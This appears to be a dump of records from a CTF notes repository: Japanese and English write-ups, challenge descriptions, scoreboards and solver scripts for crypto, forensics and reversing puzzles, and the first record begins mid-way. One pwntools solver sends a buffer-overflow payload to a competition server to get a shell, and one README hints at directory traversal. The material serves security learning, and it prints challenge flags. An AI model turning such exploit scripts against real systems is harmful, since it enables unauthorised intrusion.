assign flag[28] = 33;\n assign flag[29] = 33;\n assign flag[30] = 33;\n assign flag[31] = 125;\n```\n\n次に、オンラインでVerilogコードを実行して動作確認を行った。\n\n* [Compile and Execute Verilog Online](https://www.tutorialspoint.com/compile_verilog_online.php)\n\n試しにfor文の中で`ok`の値を出力してみると、先頭の5つが`1`、残りが`0`となっていた。これは、`flag{`の5文字が本物のフラグと一致しているからだと推測できる。そこで、`ok=1`となるような`flag[6] ~ flag[31]`を探してみる。\n\n```verilog\n for (idx = 0; idx < 32; idx++) begin\n inp = flag[idx];\n tmp = target[idx];\n #4;\n $display(ok); // add\n end\n```\n\n```\n1\n1\n1\n1\n1\n0\n0\n0\n0\n0\n0\n0\n0\n0\n0\n0\n0\n0\n0\n0\n0\n0\n0\n0\n0\n0\n0\n0\n0\n0\n0\n0\nno\n```\n\n以下のコードを実行すると`ok == 1'b1`が成り立つようなフラグがASCIIコードとして出力される。\n\n```verilog\n// Testbench\n`timescale 1ns/10ps\n\nmodule magic(\n input clk,\n input rst,\n input[7:0] inp,\n input[1:0] val,\n output reg[7:0] res\n);\n always @(*) begin\n case (val)\n 2'b00: res = (inp >> 3) | (inp << 5);\n 2'b01: res = (inp << 2) | (inp >> 6);\n 2'b10: res = inp + 8'b110111;\n 2'b11: res = inp ^ 8'd55;\n endcase\n // $display(\"val1 =\",val);\n // $display(\"res1 =\",res);\n end\nendmodule\n\nmodule chall(\n input clk,\n input rst,\n input[7:0] inp,\n output reg[7:0] res\n);\n wire[1:0] val0 = inp[1:0];\n wire[1:0] val1 = inp[3:2];\n wire[1:0] val2 = inp[5:4];\n wire[1:0] val3 = inp[7:6];\n wire[7:0] res0, res1, res2, res3;\n\n magic m0(.clk(clk), .rst(rst), .inp(inp), .val(val0), .res(res0));\n magic m1(.clk(clk), .rst(rst), .inp(res0), .val(val1), .res(res1));\n magic m2(.clk(clk), .rst(rst), .inp(res1), .val(val2), .res(res2));\n magic m3(.clk(clk), .rst(rst), .inp(res2), .val(val3), .res(res3));\n\n always @(posedge clk) begin\n if (rst) begin\n assign res = inp;\n end else begin\n assign res = res3;\n end\n // $display(\"res2 =\",res);\n end\nendmodule\n\nmodule t_chall();\n reg clk, rst, ok;\n reg[7:0] inp, idx, tmp;\n reg[7:0] res[32:0];\n wire[7:0] out;\n wire[7:0] target[32:0], flag[32:0];\n\n assign {target[0], target[1], target[2], target[3], target[4], target[5], target[6], target[7], target[8], target[9], target[10], target[11], target[12], target[13], target[14], target[15], target[16], target[17], target[18], target[19], target[20], target[21], target[22], target[23], target[24], target[25], target[26], target[27], target[28], target[29], target[30], target[31]} = {8'd182, 8'd199, 8'd159, 8'd225, 8'd210, 8'd6, 8'd246, 8'd8, 8'd172, 8'd245, 8'd6, 8'd246, 8'd8, 8'd245, 8'd199, 8'd154, 8'd225, 8'd245, 8'd182, 8'd245, 8'd165, 8'd225, 8'd245, 8'd7, 8'd237, 8'd246, 8'd7, 8'd43, 8'd246, 8'd8, 8'd248, 8'd215};\n\n // change the content of the flag as you need\n assign flag[0] = 102;\n assign flag[1] = 108;\n assign flag[2] = 97;\n assign flag[3] = 103;\n assign flag[4] = 123;\n assign flag[5] = 116;\n assign flag[6] = 104;\n assign flag[7] = 105;\n assign flag[8] = 115;\n assign flag[9] = 95;\n assign flag[10] = 105;\n assign flag[11] = 115;\n assign flag[12] = 95;\n assign flag[13] = 102;\n assign flag[14] = 97;\n assign flag[15] = 107;\n assign flag[16] = 101;\n assign flag[17] = 95;\n assign flag[18] = 102;\n assign flag[19] = 97;\n assign flag[20] = 107;\n assign flag[21] = 101;\n assign flag[22] = 95;\n assign flag[23] = 102;\n assign flag[24] = 97;\n assign flag[25] = 107;\n assign flag[26] = 101;\n assign flag[27] = 95;\n assign flag[28] = 33;\n assign flag[29] = 33;\n assign flag[30] = 33;\n assign flag[31] = 125;\n\n chall ch(.clk(clk), .rst(rst), .inp(inp), .res(out));\n\n initial begin\n $dumpfile(\"chall.vcd\");\n $dumpvars;\n\n clk = 1'b0;\n #1 rst = 1'b1;\n #1 rst = 1'b0;\n inp = flag[0];\n tmp = target[0];\n\n ok = 1'b1;\n for (idx = 0; idx < 32; idx++) begin\n //inp = flag[idx];\n tmp = target[idx];\n // add below\n for (inp = 33; inp <= 125; inp++) begin\n ok = 1'b1;\n #4;\n if (ok == 1'b1) begin\n $display(inp);\n end\n end\n end\n\n if (ok) begin\n $display(\"ok\");\n end else begin\n $display(\"no\");\n end\n\n $finish;\n end\n\n always @(posedge clk) begin\n #1 ok = ok & (out == tmp);\n end\n\n always begin\n #2 clk = ~clk;\n end\nendmodule\n```\n\n上記Verilogの出力を文字列に直す。\n\n```py\nflag = [102,108, 97,103,123,118, 51,114,121, 49, 95,118, 51,114, 49, 95,108,111,103, 49, 95,102, 49, 95, 52,100,103, 49, 95, 99,104, 51, 99,107, 51,114, 33,125]\nmsg = ''.join([chr(i) for i in flag])\nprint(msg)\n```\n\n`flag{v3ry1_v3r1_log1_f1_4dg1_ch3ck3r!}`\n\nこのまま入力するとIncorrectになった。どうやら、`49 = 1`と`95 = _`のペア、`52 = 4`と`100 = d`のペアはどちらも`ok = 1`になる条件を満たしているようなので、意味が通るようにどちらか一方を選択する。\n\n<!-- flag{v3ry_v3r1log_f14g_ch3ck3r!} -->\n\n" }, { "alpha_fraction": 0.5306122303009033, "alphanum_fraction": 0.6122449040412903, "avg_line_length": 18.600000381469727, "blob_id": "b1a95b8f362b97bf57c946f0b2163c3c286873f0", "content_id": "a468d7c570e01ce9193ac90ae57f03b8b8d34c3d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 98, "license_type": "no_license", "max_line_length": 31, "num_lines": 5, "path": "/2021/redpwnCTF_2021/beginner-generic-pwn-number-0/solver.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "from pwn import *\n\nio = remote('mc.ax', '31199')\nio.sendline(b'\\xff' * (40 + 8))\nio.interactive()\n" }, { "alpha_fraction": 0.7415730357170105, "alphanum_fraction": 0.7640449404716492, "avg_line_length": 31.454545974731445, "blob_id": "f88f95279162ea6ec827f6a51fbee3133af6223f", "content_id": "e1846d2a24835c8737fac150e56fe13dc9aa9ea8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 356, "license_type": "no_license", "max_line_length": 120, "num_lines": 11, "path": "/2021/BCACTF_2.0/Storytime_The_Tragic_Interlude/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "I've got a really sad story for today. It's about a very famous dragon. If you stick around, maybe I'll give you a flag!\n\n[story2](https://objects.bcactf.com/bcactf2/storytime-2/story2)\n\nHint 1 of 2\n\nWould you be surprised to learn that there's a very famous dragon in cybersecurity?\n\nHint 2 of 2\n\nHow can the code within a compiled executable be analyzed?" }, { "alpha_fraction": 0.6530612111091614, "alphanum_fraction": 0.7908163070678711, "avg_line_length": 27, "blob_id": "c9946fe3c72dc9b0172f91b165b233aa8d976581", "content_id": "9fe1032772372337e976c463605596678b3eef97", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 196, "license_type": "no_license", "max_line_length": 99, "num_lines": 7, "path": "/2021/DawgCTF_2021/TrashChain/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "It seems that my problems with hashing just keep multiplying...\n\nnc umbccd.io 3100\n\nAuthor: RJ\n\n[trashchain.py](https://umbccd.io/files/751fc504bbcc14a046195b6713209c77/trashchain.py?token=eyJ1c2VyX2lkIjoxMjg1LCJ0ZWFtX2lkIjo3MzgsImZpbGVfaWQiOjI5fQ.YJas5w.EbJtvteut7gLX0psRJRC2qJ9P4E)\n" }, { "alpha_fraction": 0.657940685749054, "alphanum_fraction": 0.7731239199638367, "avg_line_length": 21.959999084472656, "blob_id": "fdbb4d008cc75595cdf6cc5297021897fa3c09b3", "content_id": "8fcd161f6a2d2c6d7647084b2118be7d991aebc5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1083, "license_type": "no_license", "max_line_length": 65, "num_lines": 25, "path": "/2020/WaniCTF/zero_size_png/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\nchunk data を見ると、幅と高さ共に0になっている。うまく幅と高さの値を入力すれば復元できそう。\n\nPNGのIDAT部分を抽出してzlib展開をし、フィルタータイプの位置を調べれば幅がわかる。\n\n[参考]\n\n* http://ctf.publog.jp/archives/cat_1182010.html\n\n* https://hoshi-sano.hatenablog.com/entry/2013/08/18/113434\n\n`青い空を見上げればいつもそこに白い猫`を使ってzlibのデータ抽出を行い、バイナリエディタで調べたところ、\n\n`0x0`, `0x95d`, `0x12ba`, `0x1c17` と `0x95d` 間隔で`00`が出現することが分かった。\n\n画像の幅を`95d`にしたところ以下のように表示された。(高さは画像全体が見えるように調整する。)\n\n![](img/2020-11-22-11-48-02.png)\n\n`00`というフィルタータイプしか見ていないので、4倍分の幅を取ってきてしまった。\n\nそこで、幅を`0x95d / 4 = 0x257`にしたところフラグが鮮明に描かれた画像を得ることができた。\n\n<!-- FLAG{Cyclic_Redundancy_CAT} -->" }, { "alpha_fraction": 0.6919431090354919, "alphanum_fraction": 0.8151658773422241, "avg_line_length": 29.14285659790039, "blob_id": "89cd5de0eef88d8e2694c9b9514bcb0974f4ce34", "content_id": "445c88ed8b3a00bf5246d62c305cd0b0afc5bb3a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 221, "license_type": "no_license", "max_line_length": 109, "num_lines": 7, "path": "/2021/SECCON_Beginners_CTF_2021/Field_trip/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Someone is getting ready for a field trip.\n\n[Field_trip.tar.gz](https://beginners-dist-production.s3.isk01.sakurastorage.jp/Field_trip/Field_trip.tar.gz)\n\n6efa6c52b324de267fdef730071c58fb003eba74\n\n想定難易度: Medium\n" }, { "alpha_fraction": 0.2929559051990509, "alphanum_fraction": 0.3482554256916046, "avg_line_length": 49.63333511352539, "blob_id": "badee91d66ab17be890715d2011e75c35d65e2aa", "content_id": "621355ac01dcc41a18d7b53d2a9e026107480a17", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1523, "license_type": "no_license", "max_line_length": 129, "num_lines": 30, "path": "/2021/SECCON_Beginners_CTF_2021/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# SECCON Beginners CTF 2021\n\n* https://score.beginners.azure.noc.seccon.jp/\n\n* 2021/05/22 14:00 JST — 2021/05/23 14:00 JST\n\n## My Challenges\n\n### Solved\n\n| tag | problem | comment | score | solved |\n| --------- | ------------------------------------------ | --------------------------------------------------- | ----: | -----: |\n| Misc | [depixelization](depixelization) | OpenCV | 136 | 166 |\n| Crypto | [Field_trip](Field_trip) | Merkle–Hellman knapsack cryptosystem | 394 | 28 |\n| Crypto | [GFM](GFM) | Math, Matrics | 222 | 97 |\n| Crypto | [Imaginary](Imaginary) | ECB Mode | 264 | 75 |\n| Crypto | [Logical_SEESAW](Logical_SEESAW) | AND | 118 | 190 |\n| Crypto | [p-8RSA](p-8RSA) | RSA, fermat's factorization method, GCD(e,phi) != 1 | 387 | 30 |\n| Reversing | [please_not_trace_me](please_not_trace_me) | GDB, set variable | 242 | 86 |\n| Crypto | [simple_RSA](simple_RSA) | RSA, e = 3 | 75 | 289 |\n\n---\n\n## Result\n\nTeam: ctfrd\n\n* 3198 points\n\n* 26 / 943 (> 1 pt)\n" }, { "alpha_fraction": 0.6121495366096497, "alphanum_fraction": 0.827102780342102, "avg_line_length": 41.79999923706055, "blob_id": "de868c317781ac9971082fc52f6494c871b20726", "content_id": "ad97aa46f44f6ca831bbe6d9c481c4f2f504166a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 214, "license_type": "no_license", "max_line_length": 133, "num_lines": 5, "path": "/2021/redpwnCTF_2021/round-the-bases/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "My flag has been all around the bases. Can you help me get it back?\n\nDownloads\n\n[round-the-bases](https://static.redpwn.net/uploads/41171cb0619af29b7609593f4886694e206309d84d9fb8de0b09998bd83f42f3/round-the-bases)\n" }, { "alpha_fraction": 0.6975609660148621, "alphanum_fraction": 0.8341463208198547, "avg_line_length": 50.5, "blob_id": "9c9a1080fc2a1bad32f6e58c195a66d17a923422", "content_id": "4e84686cf7072e99b9940418b30b8a95ef9c0632", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 327, "license_type": "no_license", "max_line_length": 111, "num_lines": 4, "path": "/2020/Harekaze_mini_CTF_2020/rsa/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "知床鈴: (((晴風の乗組員は連絡用に鍵ペアを作ることになったけど、秘密鍵を自分で持っておくのは怖いから、これも暗号化しちゃおう……)))\n\nAttachments: [rsa.zip](https://static.harekaze.com/crypto/rsa/78e6d92a9472e38cb55a468bf57cadc8e9a659e9/rsa.zip)\nAuthor: theoldmoon0602" }, { "alpha_fraction": 0.6056337952613831, "alphanum_fraction": 0.6197183132171631, "avg_line_length": 27.399999618530273, "blob_id": "93b3e0cb99beeaab4b11e81531af7195a2cdd6e3", "content_id": "2c7e4c2bce47333a71337207fe25d440ba5f3517", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 142, "license_type": "no_license", "max_line_length": 67, "num_lines": 5, "path": "/2021/WaniCTF21-spring/binary/solver.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "import os\n\nf = open(os.path.dirname(__file__)+'/mis-binary/binary.csv').read()\nf = f.replace(\"\\n\",\"\")\nprint(bytes.fromhex(hex(int(f,2))[2:]))\n" }, { "alpha_fraction": 0.49702969193458557, "alphanum_fraction": 0.5782178044319153, "avg_line_length": 37.846153259277344, "blob_id": "5bf8216bc1230860972a8273bb7c405219f5c113", "content_id": "0f2a44e9ea6537484d89f8c7ced4da1a883bb371", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1010, "license_type": "no_license", "max_line_length": 95, "num_lines": 26, "path": "/2021/SECCON_Beginners_CTF_2021/depixelization/solver.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "import cv2\nimport numpy as np\nimport os\nimport string\n\nimages = cv2.imread(os.path.dirname(__file__)+\"/output.png\", 1)\nheight, width, _ = images.shape\n\nfor i in range(width//85):\n\n for char in string.printable:\n # char2img\n img = np.full((100, 85, 3), (255,255,255), dtype=np.uint8)\n cv2.putText(img, char, (0, 80), cv2.FONT_HERSHEY_PLAIN, 8, (0, 0, 0), 5, cv2.LINE_AA)\n\n # pixelization\n cv2.putText(img, \"P\", (0, 90), cv2.FONT_HERSHEY_PLAIN, 7, (0, 0, 0), 5, cv2.LINE_AA)\n cv2.putText(img, \"I\", (0, 90), cv2.FONT_HERSHEY_PLAIN, 8, (0, 0, 0), 5, cv2.LINE_AA)\n cv2.putText(img, \"X\", (0, 90), cv2.FONT_HERSHEY_PLAIN, 9, (0, 0, 0), 5, cv2.LINE_AA)\n simg = cv2.resize(img, None, fx=0.1, fy=0.1, interpolation=cv2.INTER_NEAREST) # WTF :-o\n img = cv2.resize(simg, img.shape[:2][::-1], interpolation=cv2.INTER_NEAREST)\n\n # compare\n if(np.array_equal(img,images[0:height,85*i:85*(i+1)])):\n print(char,end='')\n break\n" }, { "alpha_fraction": 0.4421272277832031, "alphanum_fraction": 0.569343090057373, "avg_line_length": 18.97916603088379, "blob_id": "00cb9c5bbd6de0c43dd46c0279d4bc5051284038", "content_id": "31c9408edd3553bbe281a531109fecf15d6dc74a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1165, "license_type": "no_license", "max_line_length": 240, "num_lines": 48, "path": "/2021/BCACTF_2.0/Cipher_Mishap/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n以下のテキストが与えられる。\n\n```\n126-Y, 113-N, 122-N, 130-N, 117-N, 107-N, 137, 114-N, 127-Y, 137, 113-Y, 104-N, 131-N, 110-N, 137, 105-Y, 110-N, 110-N, 121-Y, 137, 131-Y, 114-N, 112-N, 110-N, 121-N, 110-N, 125-N, 110-N, 137, 114-Y, 121-N, 126-N, 127-N, 110-N, 104-N, 107-N\n```\n\n`0 ~ 7`の数字しか出現しないので8進数とみて変換する。\n\n`-Y`がCaps Lockの有効、`-N`が無効を表しているとすると、大文字と小文字が区別される。\n\n```\nVkrxog_lW_Kdyh_EhhQ_Yljhqhuh_Lqvwhdg\n```\n\nさらにROTしてみたところ、ROT23で意味の通る英文になった。\n\n```\nShould_iT_Have_BeeN_Vigenere_Instead\n```\n\nsolverは以下の通りである。\n\n```py\nimport string\n\nUPPER = string.ascii_uppercase * 2\n\nl = open('text.txt','r').read().replace('\\n','').split(', ')\n\nplain = ''\nfor s in l:\n ss = s.split('-')\n c = chr(int(ss[0],8))\n if(len(ss) == 2):\n c = UPPER[UPPER.find(c) + 23] # ROT23\n if(ss[1] == 'Y'):\n plain += c\n else:\n plain += c.lower()\n else:\n plain += c\n\nprint(plain)\n```\n\n<!-- bcactf{Should_iT_Have_BeeN_Vigenere_Instead} -->\n" }, { "alpha_fraction": 0.5040816068649292, "alphanum_fraction": 0.6000000238418579, "avg_line_length": 32.75862121582031, "blob_id": "35113c1ced09adf5cf0ac78ae1fb3f8c86cf2425", "content_id": "4cf10d9239cbe5ed32d40f93f9aeb164f76eee60", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1106, "license_type": "no_license", "max_line_length": 129, "num_lines": 29, "path": "/2021/BCACTF_2.0/Geralds_New_Job/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\npdfファイルが与えられる。\n\n`binwalk`を使って調べたところ、pngファイルがあることが分かったので展開する。\n\n```bash\n$ binwalk gerald.pdf\n\nDECIMAL HEXADECIMAL DESCRIPTION\n--------------------------------------------------------------------------------\n0 0x0 PDF document, version: \"1.3\"\n66 0x42 Zip archive data, at least v2.0 to extract, uncompressed size: 441011, name: GeraldFlag.png\n390777 0x5F679 Zip archive data, at least v2.0 to extract, uncompressed size: 367, name: __MACOSX/._GeraldFlag.png\n391327 0x5F89F End of Zip archive, footer length: 22\n392072 0x5FB88 Zlib compressed data, default compression\n722826 0xB078A Zlib compressed data, default compression\n723219 0xB0913 End of Zip archive, footer length: 22\n```\n\n```bash\n$ binwalk -e gerald.pdf\n```\n\nフラグが書かれた画像ファイルが得られた。\n\n![](./_gerald.pdf.extracted/GeraldFlag.png)\n\n<!-- bcactf{g3ra1d_15_a_ma5ter_p01yg1ot_0769348} -->\n\n" }, { "alpha_fraction": 0.730555534362793, "alphanum_fraction": 0.7444444298744202, "avg_line_length": 31.727272033691406, "blob_id": "744ea69907ba86ec969efecb9141451dea478d7c", "content_id": "66ce2e1d7247f19c7126e04cdccf452c00171f08", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 360, "license_type": "no_license", "max_line_length": 175, "num_lines": 11, "path": "/2021/ImaginaryCTF_2021/Build-A-Website/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "**Description**\n\nI made a website where y'all can create your own websites! Should be considerably secure even though I'm a bit rusty with Flask.\n\n**Attachments**\n\n[https://imaginaryctf.org/r/3ACF-app.py](https://imaginaryctf.org/r/3ACF-app.py) [http://build-a-website.chal.imaginaryctf.org/](http://build-a-website.chal.imaginaryctf.org/)\n\n**Author**\n\nEth007\n" }, { "alpha_fraction": 0.6048064231872559, "alphanum_fraction": 0.6283934116363525, "avg_line_length": 19.243244171142578, "blob_id": "14153b7d3cc470597b0bb83db98cc8c1120e32bf", "content_id": "7039e29ab0fc02806837ddbd75eb4f385d8d6154", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2495, "license_type": "no_license", "max_line_length": 66, "num_lines": 111, "path": "/2021/UIUCTF_2021/back_to_basics/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n以下のプログラムと暗号文が与えられる。\n\n```py\nfrom Crypto.Util.number import long_to_bytes, bytes_to_long\nfrom gmpy2 import mpz, to_binary\n#from secret import flag, key\n\nALPHABET = bytearray(b\"0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ#\")\n\ndef base_n_encode(bytes_in, base):\n\treturn mpz(bytes_to_long(bytes_in)).digits(base).upper().encode()\n\ndef base_n_decode(bytes_in, base):\n\tbytes_out = to_binary(mpz(bytes_in, base=base))[:1:-1]\n\treturn bytes_out\n\ndef encrypt(bytes_in, key):\n\tout = bytes_in\n\tfor i in key:\n print(i)\n out = base_n_encode(out, ALPHABET.index(i))\n\treturn out\n\ndef decrypt(bytes_in, key):\n\tout = bytes_in\n\tfor i in key:\n\t\tout = base_n_decode(out, ALPHABET.index(i))\n\treturn out\n\n\"\"\"\nflag_enc = encrypt(flag, key)\nf = open(\"flag_enc\", \"wb\")\nf.write(flag_enc)\nf.close()\n\"\"\"\n```\n\n暗号化は、\n\n1. 文字列を数字に変換\n\n * `b'flag' ⇒ 1718378855`\n\n2. 数字をN進数に変換 `(key = b'K')`\n\n * `1718378855 ⇒ b'K0FF0EB' (K=21進数)`\n\nを繰り返し行う。\n\nよって、復号化は逆の手順をやればよい。復号化した結果がN進数の文字列になるかどうかチェックしていく。\n\n以下のプログラムを実行してフラグが得られた。\n\n\n```py\nfrom Crypto.Util.number import long_to_bytes, bytes_to_long\nfrom gmpy2 import mpz, to_binary\n\nALPHABET = bytearray(b\"0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ#\")\n\ndef base_n_encode(bytes_in, base):\n\treturn mpz(bytes_to_long(bytes_in)).digits(base).upper().encode()\n\ndef base_n_decode(bytes_in, base):\n\tbytes_out = to_binary(mpz(bytes_in, base=base))[:1:-1]\n\treturn bytes_out\n\ndef encrypt(bytes_in, key):\n\tout = bytes_in\n\tfor i in key:\n print(i)\n out = base_n_encode(out, ALPHABET.index(i))\n\treturn out\n\ndef decrypt(bytes_in, key):\n\tout = bytes_in\n\tfor i in key:\n\t\tout = base_n_decode(out, ALPHABET.index(i))\n\treturn out\n\n# encrypt\n\"\"\"\nflag_enc = encrypt(flag, key)\nf = open(\"flag_enc\", \"wb\")\nf.write(flag_enc)\nf.close()\n\"\"\"\n\n# decrypt\nflag_enc = open(\"flag_enc\", \"rb\").read()\nkey = b''\nwhile True:\n for k in ALPHABET:\n bk = long_to_bytes(k)\n try:\n flag_dec = decrypt(flag_enc, bk)\n if '\\\\x' not in str(flag_dec):\n key += bk\n flag_enc = flag_dec\n break\n except Exception as e:\n # invalid digits\n pass\n if b'uiuctf' in flag_dec:\n print(flag_dec)\n break\n```\n\n<!-- uiuctf{r4DixAL} -->\n" }, { "alpha_fraction": 0.30408161878585815, "alphanum_fraction": 0.4612244963645935, "avg_line_length": 22.33333396911621, "blob_id": "ff95ce1b947b10358b604a0ad98569c42b4506a1", "content_id": "5139978c0ab37e8fd2453300934eacbe8cfe6488", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 490, "license_type": "no_license", "max_line_length": 108, "num_lines": 21, "path": "/2021/RaRCTF_2021/minigen/solver.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "import string\n\nCHAR = string.printable\n\nct = [281, 547, 54, 380, 392, 98, 158, 440, 724, 218, 406, 672, 193, 457, 694, 208, 455, 745, 196, 450, 724]\nflag = 'ra' # rarctf{\n\ns, t, u = ct[0]^ord('r'), ct[1]^ord('a'), ct[2]^ord('r')\nd = (t-s)%727\ndiff = ((u-t)%727 - d)\n\nfor idx in range(2,len(ct)):\n for c in CHAR:\n u = ct[idx]^ord(c)\n if d + diff == (u-t)%727:\n flag += c\n d = (u-t)%727\n s = t\n t = u\n break\nprint(flag)\n" }, { "alpha_fraction": 0.6872727274894714, "alphanum_fraction": 0.7454545497894287, "avg_line_length": 29.66666603088379, "blob_id": "687e2891a002ab06a9a56601b198ca6c68fef68d", "content_id": "723afd7910c1e667455e8f9f43fff048094bcd3e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 347, "license_type": "no_license", "max_line_length": 121, "num_lines": 9, "path": "/2020/WaniCTF/Veni_vidi/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\nフラグの形式が、`FLAG{[0-9a-zA-Z_\\-$@!?]+}`であるので`SYNT{fvzcyr_pynffvpny_pvcure}`が換字式であると推測。\n\nROT13したところ、フラグを取得\n\n* [CyberChef](https://gchq.github.io/CyberChef/#recipe=ROT13(true,true,13)&input=U1lOVHtmdnpjeXJfcHluZmZ2cG55X3B2Y3VyZX0)\n\n<!-- FLAG{simple_classical_cipher} -->" }, { "alpha_fraction": 0.3284023702144623, "alphanum_fraction": 0.4585798680782318, "avg_line_length": 15.095237731933594, "blob_id": "d4e5df6b48af7bde59b26953b68afd28889d945b", "content_id": "b0d8ff63315c5b6b42c65f7fd9e2118b4a076f91", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 340, "license_type": "no_license", "max_line_length": 55, "num_lines": 21, "path": "/2021/PlaidCTF_2021/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# PlaidCTF 2021\n\n* http://plaidctf.com/\n\n* 2021/04/17 06:00 JST — 2021/04/19 06:00 JST\n\n## My Challenges\n\n### Solved\n\n| tag | problem | comment | score | solved |\n| ------ | -------------- | -------- | ----: | -----: |\n| Crypto | [xorsa](xorsa) | RSA, XOR | 100 | 180 |\n\n---\n\n## Result\n\n* 101 points\n\n* 127 / 541 (> 1 pt) " }, { "alpha_fraction": 0.5506172776222229, "alphanum_fraction": 0.5802469253540039, "avg_line_length": 30.230770111083984, "blob_id": "c27dae4e3b2b284b4e937b1b53bdd4269f9b74bc", "content_id": "4e60f7d24ce9ef2a427f25d0f639dd2d44e3f5af", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 405, "license_type": "no_license", "max_line_length": 91, "num_lines": 13, "path": "/2021/RITSEC_CTF_2021/Parcel/solver.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "import base64\nimport os\nimport re\n\nwith open(os.path.dirname(__file__)+'/Parcel_extract') as f:\n text = f.read()\n text = text.replace('\\n','')\n b64s = re.findall(r'iVB.*?-',text)\n for index, b in enumerate(b64s):\n # print(index)\n img = base64.b64decode(b[0:-1])\n with open(f\"{os.path.dirname(__file__)}/extract_img/image{index}.png\", 'bw') as fi:\n fi.write(img)" }, { "alpha_fraction": 0.7973856329917908, "alphanum_fraction": 0.8300653696060181, "avg_line_length": 29.600000381469727, "blob_id": "bf05a1a2b8268bcda00e3fccdfd051fff4997365", "content_id": "281b55a2be0b5521952c225377ff864a82e0869b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 187, "license_type": "no_license", "max_line_length": 113, "num_lines": 5, "path": "/2021/WaniCTF21-spring/illegal_image/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "裏で画像がやり取りされているらしい\n\n[for-illegal-image.zip](https://score.wanictf.org/storage/tmokrhl2cquaqsvj48syxgpkghq2cc0s/for-illegal-image.zip)\n\nWriter : takushooo\n" }, { "alpha_fraction": 0.8374999761581421, "alphanum_fraction": 0.8374999761581421, "avg_line_length": 24.3157901763916, "blob_id": "6c15e4af9989b4ce5a1cc08aa16b2fbfc3d6a214", "content_id": "395d67520415c2f7341fa965962dba26723c804b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 822, "license_type": "no_license", "max_line_length": 101, "num_lines": 19, "path": "/2020/WaniCTF/Simple_Memo/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "問題ページ:https://simple.wanictf.org/\n\nflag.txtというファイルに私の秘密を隠したが、 完璧にサニタイズしたため辿りつける訳がない。\n\n(Hint) ディレクトリトラバーサルという脆弱性です。\n\n何がサニタイズされているかを知るためにソースコード(reader.php)を参考にしてみてください。\n\n(注意)\n\nsimple_memo.zipは問題を解くために必須の情報ではなく、docker-composeを利用してローカルで問題環境を再現するためのものです。\n\n興味のある方は利用してみてください。\n\n[reader.php](https://score.wanictf.org/storage/tnlvzxmhsbfbgnfkjnzdryggsohweoov/reader.php)\n\n[simple_memo.zip](https://score.wanictf.org/storage/ufftwmlenojlxqigeldldmbmeeocseiq/simple_memo.zip)\n\nWriter : okmt" }, { "alpha_fraction": 0.31185439229011536, "alphanum_fraction": 0.3713723421096802, "avg_line_length": 60.60606002807617, "blob_id": "b93ded0af3153cf2f3c8efcd61a8aee788f3abc2", "content_id": "f08da4fa9330384a71b9172dba8a2da03537b17a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2035, "license_type": "no_license", "max_line_length": 123, "num_lines": 33, "path": "/2021/dCTF_2021/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# DCTF 2021\n\n* http://dctf.dragonsec.si/\n\n* 2021/05/15 00:00 JST — 2021/05/17 06:59 JST\n\n## My Challenges\n\n### Solved\n\n| tag | problem | comment | score | solved |\n| --------- | ---------------------------------------------------------------- | ----------------------- | ----: | -----: |\n| Misc | [Bad Apple](Bad_Apple) | Audacity, QR code | 200 | 159 |\n| Reversing | [Bell](Bell) | Ghidra | 100 | 218 |\n| Misc | [Don't let it run](Dont_let_it_run) 